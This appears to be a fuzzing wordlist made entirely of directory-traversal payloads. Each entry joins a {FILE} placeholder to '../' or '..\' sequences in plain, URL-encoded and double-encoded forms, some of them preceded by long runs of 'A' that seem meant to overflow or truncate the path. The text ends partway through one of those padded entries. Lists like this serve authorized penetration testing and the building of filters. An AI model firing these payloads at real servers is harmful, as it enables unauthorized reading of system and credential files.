%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
\../{FILE}&lt;br /&gt;
\../\../{FILE}&lt;br /&gt;
\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
/..\{FILE}&lt;br /&gt;
/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA